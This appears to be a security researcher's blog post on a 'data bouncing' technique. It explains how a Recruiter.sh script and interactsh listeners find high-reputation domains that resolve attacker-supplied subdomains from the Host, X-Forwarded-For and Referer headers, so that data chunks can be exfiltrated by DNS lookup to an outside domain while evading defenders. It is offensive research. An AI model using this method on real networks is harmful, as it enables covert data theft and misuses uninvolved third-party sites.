Identifying Candidates
This post covers one way of identifying data bouncing candidates, after all, you'll need a list of available and capable domains to use, here's how you get them...
If you're not watching the video above (and you should watch it) you can get stuck in with the items below, the Recruiter script will allow you to add an out-of-band (OOB) domain, your potential target files (such as a list of 1000 or 1000000 high reputation domains) and it will fire off a request to each domain padded with a collection of additional headers that will inform your listener of the origin (such as domain) and position (such as 'host', X-Forward-for, Referrer etc...), for listeners there are a few options, the quick option is to use the interactsh service available for all in the link below, altho for committed efforts I'd recommend setting up your own interactsh server, for light work, you might get away with burp's collaborator, but for manageability, I'd reach for Taborator, if you get too much tho... burp has a reputation ... you know.
Recruiter.sh - get them lookups, the origin and position
Once Downloaded you have two flags, you can set in the script or arguments
./Recruiter.sh -o "your-custom-oob-domain.com" -d "customdomains.txt
dont forget to Chmod +x Recruiter.sh to make it exectuable.
Downlaod Script here: https://gist.github.com/yosignals/7329d6863d7804ec8b1eb43636d691a3
Interactsh - Listen and collect
If you do not want to use Burp's collaborator (ideal for small pieces of work) the Project Discovery's Interactsh system is reliable either their own hosted server at https://app.interactsh.com/#/ or if you're more polite, putting your own self hosted instance online, eihter way, they will give you your custom oob domain
Target Lists - Stuff to be sent
This is really up to you, but there are a few places that host the top N hosts on the internet, here's what we used for this video https://dataforseo.com/free-seo-stats/top-1000-websites
Cygenta's List
FC has an excellent corpus here https://www.cygenta.co.uk/post/10-million
If you want to go ballistic
Bohdan has an amazing project, there is a free old dataset on github, but, give the man some money to pay for the overhead and effort to cutting out fresh data, big data*.
https://domainsproject.org
*Good data to have for silent enumeration
When you're done with your recruitment, you'll be left with a collection of usable targets and their position, we prepend the position, to the domain we sent it too so when we receive lookups the position is in a subdomain, this is easier for sorting
so if we have host.google.com, xff.apple.com, ref.microsoft.com etc... this means that when we are sending the data, the bouncer script will read that as position and domain, so it takes one of it's chunks add's it to the position and fires it off to the domain
google.com would get a piece in it's hostheader so the host header would be chunk of data.and.metadata.exfiltrationdomain.co.uk, and apple's would be in the X-Forwarded-For, Microsoft's in it's referrer header, so on and so fourth, becoming more elusive
The script allows for proxies too, if you're wanting a closer look, push it through your proxy, or Wireshark, you'll see a common theme that will frustrate defense and put a smile on offsec